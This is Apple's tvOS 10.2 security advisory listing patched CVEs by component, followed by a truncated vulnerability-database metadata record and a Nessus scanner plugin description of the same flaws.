## About Apple security updates
For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.
For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).
Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.

## tvOS 10.2
Released March 27, 2017
**Audio**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2430: an anonymous researcher working with Trend Micro’s Zero Day Initiative
CVE-2017-2462: an anonymous researcher working with Trend Micro’s Zero Day Initiative
**Carbon**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution
Description: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.
CVE-2017-2379: John Villamil, Doyensec, riusksk (泉哥) of Tencent Security Platform Department
**CoreGraphics**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted image may lead to a denial of service
Description: An infinite recursion was addressed through improved state management.
CVE-2017-2417: riusksk (泉哥) of Tencent Security Platform Department
**CoreGraphics**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2444: Mei Wang of 360 GearTeam
**CoreText**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2435: John Villamil, Doyensec
**CoreText**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font may result in the disclosure of process memory
Description: An out-of-bounds read was addressed through improved input validation.
CVE-2017-2450: John Villamil, Doyensec
**CoreText**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted text message may lead to application denial of service
Description: A resource exhaustion issue was addressed through improved input validation.
CVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI
**FontParser**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2487: riusksk (泉哥) of Tencent Security Platform Department
CVE-2017-2406: riusksk (泉哥) of Tencent Security Platform Department
**FontParser**
Available for: Apple TV (4th generation)
Impact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2407: riusksk (泉哥) of Tencent Security Platform Department
**FontParser**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font may result in the disclosure of process memory
Description: An out-of-bounds read was addressed through improved input validation.
CVE-2017-2439: John Villamil, Doyensec
**HTTPProtocol**
Available for: Apple TV (4th generation)
Impact: A malicious HTTP/2 server may be able to cause undefined behavior
Description: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.
CVE-2017-2428
Entry updated March 28, 2017
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted image may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2416: Qidan He (何淇丹, @flanker_hqd) of KeenLab, Tencent
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2467
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted image may lead to unexpected application termination
Description: An out-of-bounds read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.
CVE-2016-3619
**JavaScriptCore**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A use after free issue was addressed through improved memory management.
CVE-2017-2491: Apple
Entry added May 2, 2017
**JavaScriptCore**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted web page may lead to universal cross site scripting
Description: A prototype issue was addressed through improved logic.
CVE-2017-2492: lokihardt of Google Project Zero
Entry updated April 24, 2017
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: An integer overflow was addressed through improved input validation.
CVE-2017-2440: an anonymous researcher
**Kernel**
Available for: Apple TV (4th generation)
Impact: A malicious application may be able to execute arbitrary code with root privileges
Description: A race condition was addressed through improved memory handling.
CVE-2017-2456: lokihardt of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A use after free issue was addressed through improved memory management.
CVE-2017-2472: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: A malicious application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2473: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: An off-by-one issue was addressed through improved bounds checking.
CVE-2017-2474: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A race condition was addressed through improved locking.
CVE-2017-2478: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A buffer overflow issue was addressed through improved memory handling.
CVE-2017-2482: Ian Beer of Google Project Zero
CVE-2017-2483: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with elevated privileges
Description: A memory corruption issue was addressed through improved memory handling.
CVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)
Entry added March 31, 2017
**Keyboards**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code
Description: A buffer overflow was addressed through improved bounds checking.
CVE-2017-2458: Shashank (@cyberboyIndia)
**Keychain**
Available for: Apple TV (4th generation)
Impact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.
Description: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.
CVE-2017-2448: Alex Radocea of Longterm Security, Inc.
Entry updated March 30, 2017
**libarchive**
Available for: Apple TV (4th generation)
Impact: A local attacker may be able to change file system permissions on arbitrary directories
Description: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.
CVE-2017-2390: Omer Medan of enSilo Ltd
**libc++abi**
Available for: Apple TV (4th generation)
Impact: Demangling a malicious C++ application may lead to arbitrary code execution
Description: A use after free issue was addressed through improved memory management.
CVE-2017-2441
**libxslt**
Available for: Apple TV (4th generation)
Impact: Multiple vulnerabilities in libxslt
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-5029: Holger Fuhrmannek
Entry added March 28, 2017
**Security**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with root privileges
Description: A buffer overflow was addressed through improved bounds checking.
CVE-2017-2451: Alex Radocea of Longterm Security, Inc.
**Security**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution
Description: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.
CVE-2017-2485: Aleksandar Nikolic of Cisco Talos
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may exfiltrate data cross-origin
Description: A prototype access issue was addressed through improved exception handling.
CVE-2017-2386: André Bargull
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2394: Apple
CVE-2017-2396: Apple
CVE-2016-9642: Gustavo Grieco
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-2395: Apple
CVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative
CVE-2017-2455: Ivan Fratric of Google Project Zero
CVE-2017-2459: Ivan Fratric of Google Project Zero
CVE-2017-2460: Ivan Fratric of Google Project Zero
CVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin
CVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab
CVE-2017-2466: Ivan Fratric of Google Project Zero
CVE-2017-2468: lokihardt of Google Project Zero
CVE-2017-2469: lokihardt of Google Project Zero
CVE-2017-2470: lokihardt of Google Project Zero
CVE-2017-2476: Ivan Fratric of Google Project Zero
CVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative
Entry updated June 20, 2017
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A type confusion issue was addressed through improved memory handling.
CVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to high memory consumption
Description: An uncontrolled resource consumption issue was addressed through improved regex processing.
CVE-2016-9643: Gustavo Grieco
**WebKit**
Available for: Apple TV (4th generation)
Impact: A malicious website may exfiltrate data cross-origin
Description: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.
CVE-2017-2367: lokihardt of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to universal cross site scripting
Description: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.
CVE-2017-2445: lokihardt of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
CVE-2017-2446: Natalie Silvanovich of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Visiting a maliciously crafted website may compromise user information
Description: A memory corruption issue was addressed through improved memory handling.
CVE-2017-2447: Natalie Silvanovich of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative
Entry added March 28, 2017
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to universal cross site scripting
Description: A logic issue existed in frame handling. This issue was addressed through improved state management.
CVE-2017-2475: lokihardt of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may exfiltrate data cross-origin
Description: A validation issue existed in element handling. This issue was addressed through improved validation.
CVE-2017-2479: lokihardt of Google Project Zero
Entry added March 28, 2017
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may exfiltrate data cross-origin
Description: A validation issue existed in element handling. This issue was addressed through improved validation.
CVE-2017-2480: lokihardt of Google Project Zero
CVE-2017-2493: lokihardt of Google Project Zero
Entry updated April 24, 2017

## Additional recognition
**XNU**
We would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.
"GOOGLE_CHROME_57_0_2987_98.NASL", "ITUNES_12_6.NASL", "ITUNES_12_6_BANNER.NASL", "MACOSX_GOOGLE_CHROME_57_0_2987_98.NASL", "MACOSX_SAFARI10_1.NASL", "MACOSX_SECUPD2017-001.NASL", "MACOS_10_12_4.NASL", "OPENSUSE-2017-353.NASL", "OPENSUSE-2017-609.NASL", "PHOTONOS_PHSA-2017-0018.NASL", "REDHAT-RHSA-2017-0499.NASL", "SUSE_SU-2017-1282-1.NASL", "SUSE_SU-2017-1313-1.NASL", "SUSE_SU-2018-3879-1.NASL", "UBUNTU_USN-3236-1.NASL", "UBUNTU_USN-3257-1.NASL", "UBUNTU_USN-3271-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703810", "OPENVAS:1361412562310810586", "OPENVAS:1361412562310810587", "OPENVAS:1361412562310810588", "OPENVAS:1361412562310810724", "OPENVAS:1361412562310810727", "OPENVAS:1361412562310810728", "OPENVAS:1361412562310810983", "OPENVAS:1361412562310810994", "OPENVAS:1361412562310813437", "OPENVAS:1361412562310843118", "OPENVAS:1361412562310843130", "OPENVAS:1361412562310843148", "OPENVAS:1361412562310851525", "OPENVAS:1361412562310872863", "OPENVAS:1361412562310872901", "OPENVAS:1361412562310890693", "OPENVAS:1361412562310890866", "OPENVAS:703810"]}, {"type": "osv", "idList": ["OSV:DLA-693-1", "OSV:DLA-693-2", "OSV:DLA-866-1", "OSV:DSA-3810-1", "OSV:GHSA-PF6M-FXPQ-FG8V"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141956", "PACKETSTORM:141963", "PACKETSTORM:141964", "PACKETSTORM:141965", "PACKETSTORM:141967", "PACKETSTORM:141968", "PACKETSTORM:141969", "PACKETSTORM:141970", "PACKETSTORM:141971", "PACKETSTORM:141972", "PACKETSTORM:141977", "PACKETSTORM:141980", "PACKETSTORM:142660"]}, {"type": "photon", "idList": ["PHSA-2017-0018", "PHSA-2017-0044"]}, {"type": "redhat", "idList": ["RHSA-2017:0499"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5029"]}, {"type": "rubygems", "idList": ["RUBY:NOKOGIRI-2017-5029"]}, {"type": "seebug", "idList": ["SSV:92841", "SSV:92842", "SSV:92880", "SSV:92881", "SSV:92884", "SSV:92885", "SSV:92886", "SSV:92888", "SSV:92889", "SSV:92890", "SSV:92891", "SSV:92893", "SSV:92904", "SSV:92906", "SSV:92907", 
"SSV:92908", "SSV:92909", "SSV:92910", "SSV:92919", "SSV:92920", "SSV:92921", "SSV:92922", "SSV:92923", "SSV:92924", "SSV:92993", "SSV:93079", "SSV:93150"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:0738-1", "OPENSUSE-SU-2017:0740-1"]}, {"type": "talos", "idList": ["TALOS-2017-0296"]}, {"type": "ubuntu", "idList": ["USN-3236-1", "USN-3257-1", "USN-3271-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-3619", "UB:CVE-2016-9642", "UB:CVE-2016-9643", "UB:CVE-2017-2367", "UB:CVE-2017-2386", "UB:CVE-2017-2390", "UB:CVE-2017-2394", "UB:CVE-2017-2395", "UB:CVE-2017-2396", "UB:CVE-2017-2415", "UB:CVE-2017-2428", "UB:CVE-2017-2445", "UB:CVE-2017-2446", "UB:CVE-2017-2447", "UB:CVE-2017-2454", "UB:CVE-2017-2455", "UB:CVE-2017-2459", "UB:CVE-2017-2460", "UB:CVE-2017-2463", "UB:CVE-2017-2464", "UB:CVE-2017-2465", "UB:CVE-2017-2466", "UB:CVE-2017-2468", "UB:CVE-2017-2469", "UB:CVE-2017-2470", "UB:CVE-2017-2475", "UB:CVE-2017-2476", "UB:CVE-2017-2479", "UB:CVE-2017-2480", "UB:CVE-2017-2481", "UB:CVE-2017-5029"]}, {"type": "zdi", "idList": ["ZDI-17-188", "ZDI-17-189", "ZDI-17-190", "ZDI-17-191", "ZDI-17-241", "ZDI-17-321", "ZDI-17-441"]}, {"type": "zdt", "idList": ["1337DAY-ID-27448", "1337DAY-ID-27449", "1337DAY-ID-27450", "1337DAY-ID-27474", "1337DAY-ID-27495", "1337DAY-ID-27496", "1337DAY-ID-27497", "1337DAY-ID-27498", "1337DAY-ID-27500", "1337DAY-ID-27501", "1337DAY-ID-27502", "1337DAY-ID-27505", "1337DAY-ID-27507", "1337DAY-ID-27508", "1337DAY-ID-27509", "1337DAY-ID-27510", "1337DAY-ID-27511", "1337DAY-ID-27515", "1337DAY-ID-27516", "1337DAY-ID-27570", "1337DAY-ID-27571", "1337DAY-ID-27572", "1337DAY-ID-27573", "1337DAY-ID-27574", "1337DAY-ID-27678", "1337DAY-ID-27721"]}]}, "score": {"value": 1.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "apple", "idList": ["APPLE:20D403FA17FFAFBF6C005DAD59ACB4F6", "APPLE:581D1ADF40E75038A35B5C18CE7EDD03", "APPLE:HT207600", "APPLE:HT207607"]}, {"type": "archlinux", "idList": ["ASA-201703-4", "ASA-201703-5", 
"ASA-201704-9"]}, {"type": "attackerkb", "idList": ["AKB:857FC1A3-EE6C-45DE-93A8-A4D31D5ED28F"]}, {"type": "avleonov", "idList": ["AVLEONOV:B5CA8049524C96A911991EE8ADF24F64"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0402"]}, {"type": "chrome", "idList": ["GCSA-7294356344306922687"]}, {"type": "cve", "idList": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-5029"]}, {"type": "debian", "idList": ["DEBIAN:DLA-866-1:4F92E", "DEBIAN:DSA-3810-1:3BFFF"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5029"]}, {"type": "exploitdb", "idList": ["EDB-ID:41964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8AB0F0E2E7AF18CF22701AEF64A8CB15"]}, {"type": "fedora", "idList": ["FEDORA:0C3AC6087C5C", "FEDORA:E7DA16095B45"]}, {"type": "freebsd", "idList": ["A505D397-0758-11E7-8D8B-E8E0B747A45A"]}, {"type": "gentoo", "idList": ["GLSA-201706-15"]}, {"type": "github", "idList": ["GHSA-PF6M-FXPQ-FG8V"]}, {"type": "googleprojectzero", "idList": 
["GOOGLEPROJECTZERO:CF565C17EBBFFB26E24003CCAA054CC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:2973941148692546578"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/GENTOO-LINUX-CVE-2017-2446/", "MSF:ILITIES/GENTOO-LINUX-CVE-2017-2464/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2386/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2396/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2445/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2447/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2459/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2460/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2465/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2470/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2475/", "MSF:ILITIES/UBUNTU-CVE-2017-2396/"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-866.NASL", "DEBIAN_DSA-3810.NASL", "FEDORA_2017-58CDE32413.NASL", "FEDORA_2017-E83C26A8C9.NASL", "FREEBSD_PKG_A505D397075811E78D8BE8E0B747A45A.NASL", "GOOGLE_CHROME_57_0_2987_98.NASL", "MACOSX_GOOGLE_CHROME_57_0_2987_98.NASL", "MACOSX_SAFARI10_1.NASL", "MACOSX_SECUPD2017-001.NASL", "OPENSUSE-2017-353.NASL", "REDHAT-RHSA-2017-0499.NASL", "UBUNTU_USN-3236-1.NASL", "UBUNTU_USN-3257-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810586", "OPENVAS:1361412562310810587", "OPENVAS:1361412562310810588", "OPENVAS:1361412562310810724", "OPENVAS:1361412562310810727", "OPENVAS:1361412562310810983", "OPENVAS:1361412562310810994", "OPENVAS:1361412562310843118", "OPENVAS:1361412562310843130", "OPENVAS:1361412562310851525", "OPENVAS:703810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141956", "PACKETSTORM:141963", "PACKETSTORM:141964", "PACKETSTORM:141965", "PACKETSTORM:141967", "PACKETSTORM:141968", "PACKETSTORM:141969", "PACKETSTORM:141970", "PACKETSTORM:141971", "PACKETSTORM:141972", "PACKETSTORM:141977", "PACKETSTORM:141980"]}, {"type": "photon", "idList": ["PHSA-2017-0018", "PHSA-2017-0044"]}, {"type": "redhat", "idList": ["RHSA-2017:0499"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5029"]}, {"type": "seebug", "idList": ["SSV:92841", 
"SSV:92842", "SSV:92880", "SSV:92881", "SSV:92884", "SSV:92885", "SSV:92886", "SSV:92888", "SSV:92889", "SSV:92890", "SSV:92891", "SSV:92893", "SSV:92904", "SSV:92906", "SSV:92907", "SSV:92908", "SSV:92909", "SSV:92910", "SSV:92919", "SSV:92920", "SSV:92921", "SSV:92922", "SSV:92923", "SSV:92924", "SSV:92993", "SSV:93079", "SSV:93150"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:0738-1", "OPENSUSE-SU-2017:0740-1"]}, {"type": "talos", "idList": ["TALOS-2017-0296"]}, {"type": "ubuntu", "idList": ["USN-3236-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-9642", "UB:CVE-2016-9643", "UB:CVE-2017-2367", "UB:CVE-2017-2386", "UB:CVE-2017-2390", "UB:CVE-2017-2394", "UB:CVE-2017-2395", "UB:CVE-2017-2396", "UB:CVE-2017-2415", "UB:CVE-2017-2428", "UB:CVE-2017-2445", "UB:CVE-2017-2446", "UB:CVE-2017-2447", "UB:CVE-2017-2454", "UB:CVE-2017-2455", "UB:CVE-2017-2459", "UB:CVE-2017-2460", "UB:CVE-2017-2463", "UB:CVE-2017-2464", "UB:CVE-2017-2465", "UB:CVE-2017-2466", "UB:CVE-2017-2468", "UB:CVE-2017-2469", "UB:CVE-2017-2470", "UB:CVE-2017-2475", "UB:CVE-2017-2476", "UB:CVE-2017-2479", "UB:CVE-2017-2480", "UB:CVE-2017-2481", "UB:CVE-2017-5029"]}, {"type": "zdi", "idList": ["ZDI-17-188", "ZDI-17-189", "ZDI-17-190", "ZDI-17-191", "ZDI-17-241", "ZDI-17-321"]}, {"type": "zdt", "idList": ["1337DAY-ID-27474", "1337DAY-ID-27721"]}]}, "exploitation": null, "vulnersScore": 1.0}, "affectedSoftware": [{"name": "tvos", "operator": "lt", "version": "10.2"}], "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": 
{"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "_state": {"dependencies": 1659998956, "score": 1659964867}, "_internal": {"score_hash": "c9c27c03c3a10e1c5736b228c5ba8dba"}}

## Apple TV < 10.2 Multiple Vulnerabilities
Nessus plugin: APPLETV_10_2.NASL (scanner)
Plugin page: https://www.tenable.com/plugins/nessus/99264
Published: 2017-04-10; modified: 2019-11-13
CPE: cpe:/a:apple:apple_tv
CVSS v3.0: 7.8 (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Apple advisory reference: APPLE-SA-2017-03-27-6

According to its banner, the version of Apple TV on the remote device is prior to 10.2. It is, therefore, affected by multiple vulnerabilities:

- An out-of-bounds read error exists in LibTIFF in the DumpModeEncode() function within file tif_dumpmode.c. An unauthenticated, remote attacker can exploit this to crash a process linked against the library or disclose memory contents. (CVE-2016-3619)
- An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents. (CVE-2016-9642)
- A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)
- An information disclosure vulnerability exists in WebKit when handling page loading due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to disclose data cross-origin. (CVE-2017-2367)
- A buffer overflow condition exists in the Carbon component when handling specially crafted DFONT files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2379)
- An information disclosure vulnerability exists in WebKit when handling unspecified exceptions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2386)
- A flaw exists in the libarchive component due to the insecure creation of temporary files. A local attacker can exploit this, by using a symlink attack against an unspecified file, to cause unexpected changes to be made to file system permissions. (CVE-2017-2390)
- Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)
- A memory corruption issue exists in the Kernel component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2401)
- Multiple memory corruption issues exist in the FontParser component when handling font files due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2406, CVE-2017-2407, CVE-2017-2487)
- An unspecified type confusion error exists in WebKit that allows an unauthenticated, remote attacker to execute arbitrary code by using specially crafted web content. (CVE-2017-2415)
- A memory corruption issue exists in the ImageIO component, specifically in the GIFReadPlugin::init() function, when handling image files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted image file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2416)
- An infinite recursion condition exists in the CoreGraphics component when handling image files. An unauthenticated, remote attacker can exploit this, via a specially crafted image file, to cause a denial of service condition. (CVE-2017-2417)
- An unspecified flaw exists related to nghttp2 and LibreSSL. An unauthenticated, remote attacker can exploit this, by convincing a user to access a malicious HTTP/2 server, to have an unspecified impact on confidentiality, integrity, and availability. (CVE-2017-2428)
- A type confusion error exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2430)
- An integer overflow condition exists in the ImageIO component when handling JPEG files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2432)
- A memory corruption issue exists in the CoreText component when handling font files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2435)
- An out-of-bounds read error exists in the FontParser component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory. (CVE-2017-2439)
- An integer overflow condition exists in the Kernel component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with kernel-level privileges. (CVE-2017-2440)
- A use-after-free error exists in libc++abi when demangling C++ applications. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code. (CVE-2017-2441)
- A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)
- A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)
- A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. (CVE-2017-2446)
